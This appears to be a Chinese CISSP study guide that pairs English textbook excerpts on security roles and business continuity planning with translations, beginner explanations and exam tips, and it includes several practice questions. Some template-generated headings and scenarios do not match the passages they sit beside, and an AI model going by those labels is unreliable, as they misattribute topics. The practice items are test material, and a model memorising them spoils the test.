这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 92 / PDF P231

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

D. Termination 18. Which of the following could be classified as a form of social engineering attack? (Choose all that apply.) A. A user logs in to their workstation and then decides to get a soda from the vending machine in the stairwell. As soon as the user walks away from their workstation, another person sits down at their desk and copies all the files from a local folder onto a network share. B. You receive an email warning about a dangerous new virus spreading across the Internet. The message tells you to look for a specific file on your hard drive and delete it, since it indicates the presence of the virus. C.

A website claims to offer free temporary access to their products and services but requires that you alter the configuration of your web browser and/or firewall in order to download the access software. D. A secretary receives a phone call from a person claiming to be a client who is running late to meet the CEO. The caller asks for the CEO's private cell phone number so that they can call them. 19. Often a _____________ is a member of a group who decides (or is assigned) to take charge of leading the adoption and integration of security concepts into the group's work activities.

_____________ are often non-security employees who take up the mantle to encourage others to support and adopt more security practices and behaviors. A. CISO(s) B. Security champion(s) C. Security auditor(s) D. Custodian(s) 20. The CSO has expressed concern that after years of security training and awareness programs, the level of minor security violations has actually increased. A new security team member reviews the training materials and notices that it was crafted four years ago. They suggest that the materials be revised to be more engaging and to include elements that allow for the ability to earn recognition, team up with coworkers, and strive toward a common goal.

They claim these efforts will improve D.

中文直译 / 整理

终止 18. 以下哪项可归类为社会工程学攻击? (可多选) A. 一名用户登录其工作站后,决定去楼梯间的自动售货机买一瓶苏打水。 当用户离开工作站时,另一个人坐到其桌前,将本地文件夹中的所有文 件复制到网络共享位置。 B. 您收到一封电子邮件,警告互联网上正在传播一种危险的新病毒。 该邮件要求您在硬盘上查找特定文件并将其删除,因为该文件表明病 毒的存在。 C. 一个网站声称提供其产品和服务的免费临时访问权限,但要求您修改 网页浏览器和/或防火墙的配置,以下载访问软件。 D. 一名秘书接到一通电话,来电者自称是一名客户,因迟到无法与首 席执行官会面,请求提供首席执行官的私人手机号码以便联系。 19. 通常,_____________ 是团队中负责决定(或被指派)推动安全概念 融入团队工作活动的成员。 _____________ 通常是非安全岗位的员工,他 们主动承担起责任,鼓励他人支持并采纳更安全的做法和行为。 A. 首席信息安全 官(CISO) B. 安全倡导者 C. 安全审计员 D. 管理员 20. CSO表示担忧,尽管多年来一直开展安全培训和意识项目,但轻微安全 违规行为的数量实际上有所增加。

一名新加入安全团队的成员审查了培训材 料,发现这些材料是四年前制定的。 他们建议对 材料应进行修订,以更具吸引力,并包含允许获得认可、与同事合作以 及为共同目标努力的元素。 他们声称这些举措将改善

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 93 / PDF P232

第 232 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

security compliance and foster security behavior change. What is the approach that is being recommended? A. Program effectiveness evaluation B. Onboarding C. Compliance enforcement D. Gamification

中文直译 / 整理

安全合规性并促进安全行为的改变。 所推荐的方法是什么? A. 程序有效性评估 B. 入职 C. 合规执行 D. 游戏化

小白解释

场景先行:你是公司的安全负责人,正在读第 232 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 232 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
第 3 章 · P233-272 · 40 个学习单元

业务连续性规划

OSG10 · Chapter 3 · Business Continuity Planning · 全文覆盖 + 小白精读 + 画报

第 3 章:业务连续性规划

这不是提炼版。本页按 PDF 第 233-272 页连续覆盖第 3 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

40个连续学习单元
4格原文 / 直译 / 解释 / 考点
40页覆盖第3章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P233

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 3 Business Continuity Planning THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 1.0: Security and Risk Management 1.7 Identify, analyze, assess, prioritize, and implement Business Continuity (BC) requirements 1.7.1 Business impact analysis (BIA) 1.7.2 External dependencies Domain 7.0: Security Operations 7.13 Participate in Business Continuity (BC) planning and exercises Despite our best intentions, disasters of one form or another eventually strike every organization.

Whether it's a natural disaster such as a hurricane, earthquake, or pandemic, or a person-made calamity such as a building fire, burst water pipe, or economic crisis, every organization will encounter events that threaten their operations or even their very existence. Resilient organizations have plans and procedures in place to help mitigate the effects a disaster has on their continuing operations and to speed the return to normal operations. Recognizing the importance of planning for business continuity (BC) and disaster recovery (DR), ISC2 has included these two processes in the objectives for the CISSP program.

Knowledge of these fundamental topics will help you prepare for the exam and help you prepare your organization for the unexpected. In this chapter, we'll explore the concepts behind business continuity planning (BCP). Chapter 18, “Disaster Recovery Planning,” will continue the discussion and delve into the specifics of the technical controls that organizations can put in place to restore operations as quickly as possible after disaster strikes.

中文直译 / 整理

第3章 业务连续性规划 本章涵盖的CISSP主题包括: 领域1.0:安全与风险管理 1.7 识别、分析、评估、优先排序并实施业务连续性(BC)需求 1.7.1 业务影响分析(BIA) 1.7.2 外部依赖 领域 7.0:安全运营 7.13 参与业务连续性(BC)规划和演练 尽管我们抱有最好的意图,但各种形式的灾难最终都会袭击每个组织。 无论是 飓风、地震或大流行等自然灾害,还是建筑物火灾、水管爆裂或经济危机等人 祸,每个组织都会遇到威胁其运营甚至生存的事件。 富有弹性的组织已制定计划和程序,以减轻灾难对其持续运营的影响,并加速 恢复正常运营。 鉴于业务连续性(BC)和灾难恢复(DR)规划的重要性, ISC2 已将这两个过程纳入 CISSP 项目的目标中。 掌握这些基本主题将有助于 您备考,并帮助您的组织应对突发状况。 在本章中,我们将探讨业务连续性规划(BCP)背后的概念。 第18章“灾难 恢复规划”将延续这一讨论,深入探讨组织可以实施的技术控制措施,以便 在灾难发生后尽可能迅速地恢复运营。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 02 / PDF P234

组织流程:收购、剥离和治理委员会

组织变化会改变资产、责任和风险边界。

教材原文段落

Planning for Business Continuity Business continuity planning (BCP) involves assessing the risks to organizational processes and creating policies, plans, and procedures to minimize the impact those risks might have on the organization if they were to occur. BCP is used to maintain the continuous operation of a business in the event of an emergency. The goal of BCP planners is to implement a combination of policies, procedures, and processes such that a potentially disruptive event has as little impact on the business as possible. BCP focuses on maintaining business operations with reduced or restricted infrastructure capabilities or resources.

As long as the continuity of the organization's ability to perform its mission-critical work tasks is maintained, BCP can be used to manage and restore the environment. Business Continuity Planning vs. Disaster Recovery Planning CISSP candidates often become confused about the difference between business continuity planning (BCP) and disaster recovery planning (DRP). They might try to sequence them in a particular order or draw firm lines between the two activities. The reality of the situation is that these lines are blurry in real life and don't lend themselves to neat and clean categorization. The distinction between the two is one of perspective.

Both activities help prepare an organization for a disaster. They intend to keep operations running continuously, when possible, and recover functions as quickly as possible if a disruption occurs. The perspective difference is that business continuity activities are typically strategically focused at a high level and center themselves on business processes and operations. Disaster recovery plans tend to be more tactical and describe technical activities such as recovery sites, backups, and fault tolerance. In any event, don't get hung up on the difference between the two. It's much more important that you understand the processes and technologies involved in these two related disciplines.

You'll learn more about disaster recovery planning in Chapter 18.

中文直译 / 整理

业务连续性规划 业务连续性规划(BCP)涉及评估组织流程的风险,并制定政策、计划和程序, 以在这些风险发生时最大限度地减少其对组织的影响。 BCP用于在紧急情况下 保持业务的持续运行。 BCP规划者的目标是实施一系列政策、程序和流程,使 潜在的中断事件对业务的影响降到最低。 BCP 专注于在基础设施能力或资源减少或受限的情况下维持业务运营。 只要组 织执行其关键任务的能力得以维持,BCP 就可用于管理和恢复环境。 业务连续性规划与灾难恢复规划 CISSP 考生常常对业务连续性规划(BCP)和灾难恢复规划(DRP)之 间的区别感到困惑。 他们可能试图将两者按特定顺序排列,或在两者之 间划出明确界限。 但实际情况是,这些界限在现实中是模糊的,难以进 行清晰明确的分类。 两者的区别在于视角不同。 这两项活动都有助于组织为灾难做好准备,旨 在尽可能保持运营持续运行,并在发生中断时尽快恢复功能。 区别在于, 业务连续性活动通常从战略高度出发,聚焦于业务流程和运营; 而灾难恢 复计划则更偏向战术层面,描述技术性活动,如恢复站点、备份和容错机 制。 无论如何,不要纠结于两者之间的差异。

更重要的是,你要理解这两种 相关学科所涉及的流程和技术。 您将了解更多关于灾难恢复计划的内容,详见第18章。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:组织变化会改变资产、责任和风险边界。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“组织流程:收购、剥离和治理委员会”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 03 / PDF P235

第 235 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The overall goal of BCP is to provide a quick, calm, and efficient response in the event of an emergency and to enhance a company's ability to recover from a disruptive event promptly. The BCP process has four main elements: Project scope and planning Business impact analysis Continuity planning Plan approval and implementation The next four sections of this chapter cover each of these phases in detail. The last portion of this chapter will introduce some of the critical elements you should consider when compiling documentation of your organization's business continuity plan. The top priority of BCP and DRP is always people.

The primary concern is to get people out of harm's way; then you can address IT recovery and restoration issues. Project Scope and Planning As with any formalized business process, the development of a resilient business continuity plan requires the use of a proven methodology. Organizations should approach the planning process with several goals in mind: Organizational review: Perform a structured review of the business's organization from a crisis planning point of view. BCP team selection: Create a BCP team with the approval of senior management. Resource requirements: Assess the resources available to participate in business continuity activities.

External dependencies: Analyze the legal and regulatory landscape that governs an organization's response to a catastrophic event.

中文直译 / 整理

业务连续性计划(BCP)的总体目标是在紧急情况下提供快速、冷静且高效的应对 措施,并增强公司迅速从中断事件中恢复的能力。 BCP过程包含四个主要要素: 项目范围与规划 业务影响分析 连续性规划 计划审批与实施 本章的接下来四个部分将详细阐述每个阶段。 本章的最后一部分将介绍在编 制组织业务连续性计划文档时应考虑的一些关键要素。 BCP 和 DRP 的最高优先级始终是 人员。 首要任务是确保人员远离危 险; 之后再处理 IT 恢复和修复问题。 项目范围与规划 与任何正式化的业务流程一样,制定具有韧性的业务连续性计划需要使用 经过验证的方法论。 组织在规划过程中应牢记以下目标: 组织审查:从危机规划的角度对业务进行结构化审查 从危机规划的角度来看的组织。 BCP团队选择:在高级管理层批准下组建BCP团队。 资源需求:评估可用于参与业务连续性活动的资源。 外部依赖项:分析规范组织应对灾难性事件的法律和监管环境。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 235 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 04 / PDF P236

第 236 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The exact process you use will depend on the size and nature of your organization and its business. There isn't a “one-size-fits-all” guide to business continuity project planning. You should consult with project planning professionals in your organization and determine the approach that will work best within your organizational culture. The purpose of this phase is to ensure that the organization dedicates sufficient time and attention to both developing the project scope and plan and then documenting those activities for future reference.

Organizational Review One of the first responsibilities of the individuals responsible for business continuity planning is to perform an analysis of the business organization to identify all departments and individuals who have a stake in the BCP process.

Here are some areas to consider: Operational departments that are responsible for the core services the business provides to its clients Critical support services, such as the IT department, facilities and maintenance personnel, and other groups responsible for the upkeep of systems that support the operational departments Corporate security teams responsible for physical security, since they are many times the first responders to an incident and are also responsible for the physical safeguarding of the primary facility and alternate processing facility Senior executives and other key individuals essential for the ongoing viability of the organization This identification process is critical for two reasons.

First, it provides the groundwork necessary to help identify potential members of the BCP team (see the next section). Second, it builds the foundation for the remainder of the BCP process. Typically, the individuals spearheading the BCP effort perform the business organization analysis. Some organizations employ a dedicated business continuity manager to lead these efforts, whereas others treat it as a parttime responsibility for another IT leader. Either approach is acceptable because the output of the analysis commonly guides the selection of the remaining BCP team members. However, a thorough review of this analysis

中文直译 / 整理

您所使用的确切流程将取决于您组织的规模和业务性质。 业务连续性项目规划 没有“一刀切”的指南。 您应咨询组织内的项目规划专业人士,并确定最适合 您组织文化的方案。 本阶段的目的是确保组织为制定项目范围和计划,并为未来参考记录这些活 动,投入充足的时间和注意力。 组织审查 负责业务连续性规划的人员的首要职责之一是对业务组织进行分析,以识别所 有参与BCP流程的部门和个人。 以下是一些需要考虑的领域: 负责向客户提供核心服务的运营部门 关键支持服务,例如IT部门、设施和维护人员,以及其他负责维护支持 运营部门的系统的团队 负责物理安全的企业安全团队,因为他们往往是事件的第一响应者,同时也负有责 任 为保障主要设施和备用处理设施的物理安全 高级管理人员及其他对组织持续运营至关重要的关键人员 此识别过程至关重要,原因有二。 首先,它为识别业务连续性计划(BCP) 团队的潜在成员提供了必要的基础(见下一节)。 其次,它为BCP过程的其 余部分奠定了基础。 通常,主导BCP工作的人员负责进行业务组织分析。 一些组织会任命专职的 业务连续性经理来领导这些工作,而另一些组织则将其作为其他IT负责人的 一项兼职职责。

两种方式均可接受,因为分析的输出通常会指导其余BCP团 队成员的选择。 然而,对这一分析的全面审查

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

指南:指南是建议做法,不一定强制。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 236 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Recommended、not compulsory 常对应 guideline。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
指南 指南是建议做法,不一定强制。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 05 / PDF P237

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

should be one of the first tasks assigned to the full BCP team when it convenes. This step is critical because the individuals performing the initial analysis may have overlooked critical business functions known to BCP team members that represent other parts of the organization. If the team were to continue without revising the organizational analysis, the entire BCP process might be negatively affected, resulting in the development of a plan that does not fully address the emergency-response needs of the organization as a whole. When developing a business continuity plan, be sure to consider the location of both your headquarters and any branch offices.

The plan should account for a disaster that occurs at any location where your organization conducts its business, including your own physical locations and those of your cloud service providers. BCP Team Selection In some organizations, the IT and/or security departments bear sole responsibility for business continuity planning, and no other operational or support departments provide input. Those departments may not even know of the plan's existence until a disaster looms on the horizon or actually strikes the organization. This is a critical flaw. The isolated development of a business continuity plan can spell disaster in two ways.

First, the plan itself may not take into account knowledge possessed only by the individuals responsible for the day-to-day operation of the business. Second, it keeps operational elements “in the dark” about plan specifics until implementation becomes necessary. These two factors may lead to disengaged units disagreeing with provisions of the plan and failing to implement it properly. They also deny organizations the benefits achieved by a structured training and testing program for the plan. To prevent these situations from adversely impacting the BCP process, the individuals responsible for the effort should take special care when selecting the BCP team.

The team should include, at a minimum, the following individuals: Representatives from each of the organization's departments responsible for the core services performed by the business

中文直译 / 整理

应在BCP团队正式组建后,作为首批任务之一分配给整个团队。 这一步至关重 要,因为最初进行分析的人员可能忽略了BCP团队中来自组织其他部门成员所 熟知的关键业务职能。 如果团队在未修订组织分析的情况下继续推进,整个 BCP流程可能会受到负面影响,导致制定的计划无法全面满足组织整体的应急 响应需求。 在制定业务连续性计划时,请务必考虑总部和任何分支机构的地理位 置。 该计划应涵盖组织开展业务的任何地点可能发生的灾难,包括您自己 的物理场所以及云服务提供商的场所。 BCP 团队选择 在某些组织中,IT 和/或安全部门独自承担业务连续性规划的责任,其他运营或 支持部门不提供任何意见。 这些部门甚至可能直到灾难即将发生或实际袭击组 织时,才得知该计划的存在。 这是一个严重缺陷。 孤立地制定业务连续性计划 可能以两种方式导致灾难。 首先,该计划可能未考虑仅由负责日常运营的人员 所掌握的知识。 其次,它使运营要素在计划实施前对计划细节一无所知。 这两 个因素可能导致相关单位对计划条款持不同意见,并未能正确实施计划。 它们 还剥夺了组织通过结构化培训和测试计划所获得的益处。

为防止这些情况对BCP流程产生不利影响,负责此项工作的人员在选择BCP团 队时应特别谨慎。 团队至少应包括以下人员: 负责企业核心服务的各部门代表

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 06 / PDF P238

第 238 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Business unit team members from the functional areas identified by the organizational analysis IT subject-matter experts with technical expertise in areas covered by the BCP Cybersecurity team members with knowledge of the BCP process Physical security and facility management teams responsible for the physical plant Attorneys familiar with corporate legal, regulatory, and contractual responsibilities Human resources team members who can address staffing issues and the impact on individual employees Public relations team members who need to conduct similar planning for how they will communicate with stakeholders and the public in the event of a disruption Senior management representatives with the ability to set the vision, define priorities, and allocate resources Tips for Selecting an Effective BCP Team Select your team carefully.

You need to strike a balance between representing different points of view and creating a team with explosive personality differences. Your goal should be to create a group that is as diverse as possible and still operates in harmony. Take some time to think about the BCP team membership and who would be appropriate for your organization's technical, financial, and political environment. Who would you include? Each team member brings a unique perspective to the BCP process and will have individual biases. For example, representatives from operational departments will often consider their department the most critical to the organization's continued viability.

Although these biases may at first seem divisive, the leader of the BCP effort should embrace them and harness them productively. If used effectively, the biases will help achieve a healthy balance in the final plan as each representative advocates the needs of their department. On the other hand, without effective leadership, these biases

中文直译 / 整理

根据组织分析确定的职能领域中的业务单元团队成员 具备BCP所涵盖领域技术专长的IT主题专家 了解BCP流程的网络安全团队成员,以及负责物理设施的物理安全和 设施管理团队 熟悉公司法律、监管和合同责任的律师 能够处理人员配置问题及对员工个人影响的人力资源团队成员 需要在发生中断时规划如何与利益相关方和公众沟通的公共关系团队成员 有能力设定愿景、定义优先级并分配资源的高级管理层代表 选择有效业务连续性计划团队的建议 仔细选择您的团队。 您需要在代表不同观点与避免团队成员个性冲突之 间取得平衡。 您的目标应是组建一个尽可能多样化但仍能和谐运作的团 队。 花些时间思考业务连续性计划团队的成员构成,以及谁适合您组织的技术、 财务和政治环境。 您会包括哪些人? 每个团队成员都为业务连续性计划(BCP)过程带来了独特的视角,并带有个 人偏见。 例如,运营部门的代表通常会认为其部门对组织的持续生存最为关键。 尽管这些偏见初看可能具有分裂性,但BCP工作的领导者应接纳并有效利用它 们。 如果运用得当,这些偏见将有助于在最终计划中实现健康平衡,因为每位 代表都会为本部门的需求发声。 另一方面,如果没有有效的领导,这些偏见

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 238 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

